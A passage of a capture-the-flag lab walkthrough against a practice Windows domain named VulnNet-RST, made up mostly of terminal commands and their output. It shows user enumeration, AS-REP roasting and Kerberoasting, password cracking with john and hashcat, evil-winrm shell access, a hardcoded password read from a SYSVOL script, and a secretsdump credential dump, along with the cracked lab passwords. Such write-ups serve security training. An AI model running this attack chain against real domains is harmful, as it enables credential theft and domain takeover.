SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  526: VULNNET-RST\Key Admins (SidTypeGroup)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)                                                                                                 
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)                                                                                                  
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  1105: VULNNET-RST\a-whitehat (SidTypeUser)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  1109: VULNNET-RST\t-skid (SidTypeUser)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  1110: VULNNET-RST\j-goldenhand (SidTypeUser)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  1111: VULNNET-RST\j-leet (SidTypeUser)

or

┌──(kali㉿kali)-[~/VulnNet]
└─$ impacket-lookupsid vulnnet-rst.local/guest@10.10.129.88 
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 10.10.129.88
[*] StringBinding ncacn_np:10.10.129.88[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

or

┌──(kali㉿kali)-[~/VulnNet]
└─$ python3 /usr/share/doc/python3-impacket/examples/lookupsid.py anonymous@10.10.129.88 | tee users.txt
Password:
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.129.88
[*] StringBinding ncacn_np:10.10.129.88[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

formtatting

┌──(kali㉿kali)-[~/VulnNet]
└─$ cat users.txt | grep SidTypeUser
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

┌──(kali㉿kali)-[~/VulnNet]
└─$ cat users.txt | grep SidTypeUser | awk '{print $1}'
500:
501:
502:
1000:
1104:
1105:
1109:
1110:
1111:
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ cat users.txt | grep SidTypeUser | awk '{print $3}'
(SidTypeUser)
(SidTypeUser)
(SidTypeUser)
(SidTypeUser)
(SidTypeUser)
(SidTypeUser)
(SidTypeUser)
(SidTypeUser)
(SidTypeUser)
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ cat users.txt | grep SidTypeUser | awk '{print $2}'
VULNNET-RST\Administrator
VULNNET-RST\Guest
VULNNET-RST\krbtgt
VULNNET-RST\WIN-2BO8M1OE1M1$
VULNNET-RST\enterprise-core-vn
VULNNET-RST\a-whitehat
VULNNET-RST\t-skid
VULNNET-RST\j-goldenhand
VULNNET-RST\j-leet


┌──(kali㉿kali)-[~/VulnNet]
└─$ cat users.txt | grep SidTypeUser | awk '{print $2}' | cut -d "\\" -f1
VULNNET-RST
VULNNET-RST
VULNNET-RST
VULNNET-RST
VULNNET-RST
VULNNET-RST
VULNNET-RST
VULNNET-RST
VULNNET-RST
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ cat users.txt | grep SidTypeUser | awk '{print $2}' | cut -d "\\" -f2
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet

┌──(kali㉿kali)-[~/VulnNet]
└─$ cat users.txt | grep SidTypeUser | awk '{print $2}' | cut -d "\\" -f2 > format_users.txt
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ cat format_users.txt                                                                    
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet


Alexa Whitehat (i.e. a-whitehat)  
Jack Goldenhand (i.e. j-goldenhand)  
Tony Skid (i.e. t-skid)  
Johnny Leet (i.e. j-leet)

ASREPRoasting

ASReproasting occurs when a user account has the privilege “_Does not require Pre-Authentication_” set. This means that the account does not not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

We can retrieve Kerberos tickets using a tool called “**GetNPUsers.py**” in [Impacket](https://github.com/SecureAuthCorp/impacket). This allows us to query ASREProastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames, which we enumerated previously during our SMB enumeration.


Now, let’s use GetNPUsers.py to find users without Kerberos pre-authentication

┌──(kali㉿kali)-[~/VulnNet]
└─$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.129.88 -usersfile format_users.txt -no-pass -request -outputfile kerberos-users-found
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ ls
Business-Manager.txt   Business-Tracking.txt      Enterprise-Safety.txt  format_users.txt      users.txt
Business-Sections.txt  Enterprise-Operations.txt  Enterprise-Sync.txt    kerberos-users-found
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ cat kerberos-users-found 
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:3d3082fd1c2c6385d75e60333f829eec$86df35297f9cf61ae87137e3113f99a246a12fe1ca2af5e411c139d7c0be0045d22705095418d4a82f381db5b1a6348b79522381e40e320acc53a62e4479a88de5042f3f1eea6aaf8cabeee0d5113c592ff95a15be90b7b21571ce932b80f7d9c2abbd3b37960cc8185ec4e63219f15f1ccb4e9b59b22d6683c1431fd059f4bdc08e89cc69e51dd216c5d73d9112eae49f97b4c3bb4cb240030d1bb9d090fa56421d872b2ab72ee434ec0ac3e5e34b919fb71a42858b02e6bc514feddb58299ad660065c8496e089327bb5a85e81d1f77e2742912fb9f23e91ddd7e06064a58c15aee8dc82bcaad19b67b89e88a49b5665f766952f87


┌──(kali㉿kali)-[~/VulnNet]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt kerberos-users-found       
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tj072889*        ($krb5asrep$23$t-skid@VULNNET-RST.LOCAL)     
1g 0:00:00:04 DONE (2022-12-30 14:50) 0.2136g/s 679165p/s 679165c/s 679165C/s tj3929..tj0216044
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 


or using hashcat

https://hashcat.net/wiki/doku.php?id=example_hashes


El _KDC_ (Key Distribution Center), el servicio de _Kerberos_ encargado de distribuir los tickets a los clientes

we can use hashcat to crack the “_Kerberos 5 AS-REP type 23_” hash retrieved from the KDC

┌──(kali㉿kali)-[~/VulnNet]
└─$ hashcat -m 18200 -a 0 kerberos-users-found /usr/share/wordlists/rockyou.txt -o cracked_skid.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 1240/2545 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$t-skid@VULNNET-RST.LOCAL:3d3082fd1c2c...952f87
Time.Started.....: Fri Dec 30 14:59:25 2022 (6 secs)
Time.Estimated...: Fri Dec 30 14:59:31 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   567.9 kH/s (0.98ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3178496/14344385 (22.16%)
Rejected.........: 0/3178496 (0.00%)
Restore.Point....: 3177472/14344385 (22.15%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: tjamaalb -> tj030499
Hardware.Mon.#1..: Util: 44%

Started: Fri Dec 30 14:58:29 2022
Stopped: Fri Dec 30 14:59:33 2022

┌──(kali㉿kali)-[~/VulnNet]
└─$ cat cracked_skid.txt    
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:3d3082fd1c2c6385d75e60333f829eec$86df35297f9cf61ae87137e3113f99a246a12fe1ca2af5e411c139d7c0be0045d22705095418d4a82f381db5b1a6348b79522381e40e320acc53a62e4479a88de5042f3f1eea6aaf8cabeee0d5113c592ff95a15be90b7b21571ce932b80f7d9c2abbd3b37960cc8185ec4e63219f15f1ccb4e9b59b22d6683c1431fd059f4bdc08e89cc69e51dd216c5d73d9112eae49f97b4c3bb4cb240030d1bb9d090fa56421d872b2ab72ee434ec0ac3e5e34b919fb71a42858b02e6bc514feddb58299ad660065c8496e089327bb5a85e81d1f77e2742912fb9f23e91ddd7e06064a58c15aee8dc82bcaad19b67b89e88a49b5665f766952f87:tj072889*


Kerberoasting

Now that I have a set of standard user credentials, I started looking for supported **Service Principal Name’s (SPN’s)** and get **Ticket Granting Service (TGS)** for the SPN using “**GetUserSPNs**” tool from Impacket.

┌──(kali㉿kali)-[~/VulnNet]
└─$ GetUserSPNs.py vulnnet-rst.local/t-skid:tj072889* -dc-ip 10.10.129.88 -request
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName    Name                MemberOf                                                       PasswordLastSet             LastLogon                   Delegation 
----------------------  ------------------  -------------------------------------------------------------  --------------------------  --------------------------  ----------
CIFS/vulnnet-rst.local  enterprise-core-vn  CN=Remote Management Users,CN=Builtin,DC=vulnnet-rst,DC=local  2021-03-11 14:45:09.913979  2021-03-13 18:41:17.987528             



$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$vulnnet-rst.local/enterprise-core-vn*$cccf0ecfd900c84f2ff97ada6b44cb74$c0fe5cf6d16b1e2b16cc4dab74ab8591ce15b2e3263099b65da8d9eaf0adb4373ea5c1f8578f0709d3e046196a9e4cae6be6516fdaddc842744799790214dbd512dc3bbc7775e5812f7022a3d6ef2380d5561fa02e7c2a42ffc8ca65c140a768b93bf78c873b8ad77b78f26f678907ad73c2890f9cdd4f55e42cc483295782ebfba84e22471c9121d609f58fc3689456c354502487f338e77d3109ab69cdff87c73bd6d90391a1e252df3bf45132133c8cb7440c5e724e5b176489dbb117cc9b88e072dc28947a8d3271555ce141ad15142a5f1ad6f81c85ad67c3c8fe8946dbdba6f15318e511bf8f21261240531e3a8fe5f9bd2e97f1dd7e46d568946fec94be3fca048c7b1e71b9b5ac81586aa3db54b36b693fd5dfc5ae509c26f977beb20fe579971116606ceba00745efa89c6448aed353dbebf338a9680e858de99e329cbd50c760d542dc01f7c1e607e9a9a0a666192d52f8f148a4156e38aa61620b463188106a600120ad843db0826c5cba40b7d5517bc78397ac2a56a7e6e6b8d70684a3785e7c323dc990e90db71583e06e12a746e4dea9002a7ea9ba88ef947396ac0660627e91706108fa2cf89978d748d33e508f948dafa562b9490635aae624f755a97e42f7c8f07e3448e4ee27f9efba7e86916cd7864257683cfd01c57bf54c3d282fa7c5695547109bedb1194562fd065b8789e33a5babcac53dd737d7b050bb8cfe82d91d01571b577420a04093ca7af67653340d7be6d037bc72c72ee1495e5de5e578169ba3d93344d66adc5f73f55e5ce0779d9c259a5076f71068c877e769bfa11aa540704bd7b24d8492573941f7b5ec8122b1d1da84c904bd8af46d9185f2bf14095971e85e62bb6dd5d551b1faed46d4661dd7b6278e3a6b67aed0829ec1c1efa83bd0fe47bb19a9bef3978b3e40d47d970666d739c7fd86ffb58a697906a1d2382e7bdfa578580ed4393b04e1c16bec3f5ecf8a411221ba0150c176a54b9fc9608c6749c5725255d6610a521485754fbd8ee590c3491f3b6625aa244065cfa9a4b03c70318e8da8d5f547b50b7bbf347be976568142a4ddaea71cfa2043d1bfcf691483822addf1bf334fba119d33129093daec0450dca995daa491ade9622171d5bddac26bea0639dc1967fb043a62b0545cf10ed1d48f1cd9042fb0806a0a7501696bb4ff132fafc7b4c923f726157cf02c26600651a86319c52ad7efd9746245cadb808285f897bf16e2153c0afd03d53d6de00ece58687a192db2c5f6fdbbc9400a89a0cd801f174c87b212ed0f603826795c3a027e807703806b6c3a3674076b552aefeff27c9933d70791e674982ed5cf87037f2981e8667482a3a9ad96bedad177f1095535c6df0bbf8879de54cff5e8f4dc

┌──(kali㉿kali)-[~/VulnNet]
└─$ nano enterprise-hash           
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt enterprise-hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ry=ibfkfv,s6h,   (?)     
1g 0:00:00:03 DONE (2022-12-30 15:07) 0.2824g/s 1160Kp/s 1160Kc/s 1160KC/s ryan2lauren..ry=iIyD{N
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

or using hashcat

┌──(kali㉿kali)-[~/VulnNet]
└─$ hashcat -m 13100 -a 0 enterprise-hash /usr/share/wordlists/rockyou.txt -o cracked_enterprise.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 1240/2545 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$v...e8f4dc
Time.Started.....: Fri Dec 30 15:09:10 2022 (11 secs)
Time.Estimated...: Fri Dec 30 15:09:21 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   450.1 kH/s (1.10ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4109312/14344385 (28.65%)
Rejected.........: 0/4109312 (0.00%)
Restore.Point....: 4108288/14344385 (28.64%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ry=iu0if] -> rwtf32
Hardware.Mon.#1..: Util: 41%

Started: Fri Dec 30 15:08:33 2022
Stopped: Fri Dec 30 15:09:22 2022


┌──(kali㉿kali)-[~/VulnNet]
└─$ cat cracked_enterprise.txt 
$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$vulnnet-rst.local/enterprise-core-vn*$cccf0ecfd900c84f2ff97ada6b44cb74$c0fe5cf6d16b1e2b16cc4dab74ab8591ce15b2e3263099b65da8d9eaf0adb4373ea5c1f8578f0709d3e046196a9e4cae6be6516fdaddc842744799790214dbd512dc3bbc7775e5812f7022a3d6ef2380d5561fa02e7c2a42ffc8ca65c140a768b93bf78c873b8ad77b78f26f678907ad73c2890f9cdd4f55e42cc483295782ebfba84e22471c9121d609f58fc3689456c354502487f338e77d3109ab69cdff87c73bd6d90391a1e252df3bf45132133c8cb7440c5e724e5b176489dbb117cc9b88e072dc28947a8d3271555ce141ad15142a5f1ad6f81c85ad67c3c8fe8946dbdba6f15318e511bf8f21261240531e3a8fe5f9bd2e97f1dd7e46d568946fec94be3fca048c7b1e71b9b5ac81586aa3db54b36b693fd5dfc5ae509c26f977beb20fe579971116606ceba00745efa89c6448aed353dbebf338a9680e858de99e329cbd50c760d542dc01f7c1e607e9a9a0a666192d52f8f148a4156e38aa61620b463188106a600120ad843db0826c5cba40b7d5517bc78397ac2a56a7e6e6b8d70684a3785e7c323dc990e90db71583e06e12a746e4dea9002a7ea9ba88ef947396ac0660627e91706108fa2cf89978d748d33e508f948dafa562b9490635aae624f755a97e42f7c8f07e3448e4ee27f9efba7e86916cd7864257683cfd01c57bf54c3d282fa7c5695547109bedb1194562fd065b8789e33a5babcac53dd737d7b050bb8cfe82d91d01571b577420a04093ca7af67653340d7be6d037bc72c72ee1495e5de5e578169ba3d93344d66adc5f73f55e5ce0779d9c259a5076f71068c877e769bfa11aa540704bd7b24d8492573941f7b5ec8122b1d1da84c904bd8af46d9185f2bf14095971e85e62bb6dd5d551b1faed46d4661dd7b6278e3a6b67aed0829ec1c1efa83bd0fe47bb19a9bef3978b3e40d47d970666d739c7fd86ffb58a697906a1d2382e7bdfa578580ed4393b04e1c16bec3f5ecf8a411221ba0150c176a54b9fc9608c6749c5725255d6610a521485754fbd8ee590c3491f3b6625aa244065cfa9a4b03c70318e8da8d5f547b50b7bbf347be976568142a4ddaea71cfa2043d1bfcf691483822addf1bf334fba119d33129093daec0450dca995daa491ade9622171d5bddac26bea0639dc1967fb043a62b0545cf10ed1d48f1cd9042fb0806a0a7501696bb4ff132fafc7b4c923f726157cf02c26600651a86319c52ad7efd9746245cadb808285f897bf16e2153c0afd03d53d6de00ece58687a192db2c5f6fdbbc9400a89a0cd801f174c87b212ed0f603826795c3a027e807703806b6c3a3674076b552aefeff27c9933d70791e674982ed5cf87037f2981e8667482a3a9ad96bedad177f1095535c6df0bbf8879de54cff5e8f4dc:ry=ibfkfv,s6h,

now using evil-winrm

┌──(root㉿kali)-[/home/kali/VulnNet]
└─# evil-winrm -i 10.10.169.84 -u 'enterprise-core-vn' -p 'ry=ibfkfv,s6h,' -N


Evil-WinRM shell v3.4

Warning: Remote path completion is disabled

Info: Establishing connection to remote endpoint

^C

Warning: Press "y" to exit, press any other key to continue


Info: Exiting...


┌──(kali㉿kali)-[~/VulnNet]
└─$ sudo impacket-wmiexec  vulnnet-rst.local/enterprise-core-vn:ry=ibfkfv,s6h,@10.10.169.84
[sudo] password for kali: 
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] SMBv3.0 dialect used
[-] rpc_s_access_denied

┌──(kali㉿kali)-[~/VulnNet]
└─$ evil-winrm -i 10.10.169.84 -u "enterprise-core-vn" -p "ry=ibfkfv,s6h," -N             

Evil-WinRM shell v3.4

Warning: Remote path completion is disabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents> dir
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> dir


    Directory: C:\Users\enterprise-core-vn\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:43 PM             39 user.txt


*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> type user.txt
THM{726b7c0baaac1455d05c827b5561f4ed}

:)

privesc

┌──(kali㉿kali)-[~/VulnNet]
└─$ smbclient \\\\10.10.169.84\\NETLOGON -U t-skid
Password for [WORKGROUP\t-skid]: tj072889*
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Mar 16 19:15:49 2021
  ..                                  D        0  Tue Mar 16 19:15:49 2021
  ResetPassword.vbs                   A     2821  Tue Mar 16 19:18:14 2021

                8540159 blocks of size 4096. 4319566 blocks available
smb: \> mget *
Get file ResetPassword.vbs? yes
getting file \ResetPassword.vbs of size 2821 as ResetPassword.vbs (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> quit

or

──(kali㉿kali)-[~/VulnNet]
└─$ smbclient \\\\10.10.169.84\\SYSVOL -U t-skid
Password for [WORKGROUP\t-skid]: tj072889*
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 11 14:19:49 2021
  ..                                  D        0  Thu Mar 11 14:19:49 2021
  vulnnet-rst.local                  Dr        0  Thu Mar 11 14:19:49 2021

                8540159 blocks of size 4096. 4319297 blocks available
smb: \> cd vulnnet-rst.local\
smb: \vulnnet-rst.local\> ls
  .                                   D        0  Thu Mar 11 14:23:40 2021
  ..                                  D        0  Thu Mar 11 14:23:40 2021
  DfsrPrivate                      DHSr        0  Thu Mar 11 14:23:40 2021
  Policies                            D        0  Thu Mar 11 14:20:26 2021
  scripts                             D        0  Tue Mar 16 19:15:49 2021

                8540159 blocks of size 4096. 4319038 blocks available
smb: \vulnnet-rst.local\> cd scripts
smb: \vulnnet-rst.local\scripts\> ls
  .                                   D        0  Tue Mar 16 19:15:49 2021
  ..                                  D        0  Tue Mar 16 19:15:49 2021
  ResetPassword.vbs                   A     2821  Tue Mar 16 19:18:14 2021

                8540159 blocks of size 4096. 4319038 blocks available


┌──(kali㉿kali)-[~/VulnNet]
└─$ more ResetPassword.vbs                
Option Explicit

Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName

' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1

If (Wscript.Arguments.Count <> 0) Then
    Wscript.Echo "Syntax Error. Correct syntax is:"
    Wscript.Echo "cscript ResetPassword.vbs"
    Wscript.Quit
End If

strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"

a-whitehat : bNdKVkjv3RR9ht

use secretsdump.py to dump the NTLM hashes for all the users on the DC machine

┌──(kali㉿kali)-[~/VulnNet]
└─$ sudo secretsdump.py vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@10.10.169.84 
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[-] RemoteOperations failed: SMB SessionError: STATUS_PIPE_NOT_AVAILABLE(An instance of a named pipe cannot be found in the listening state.)
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
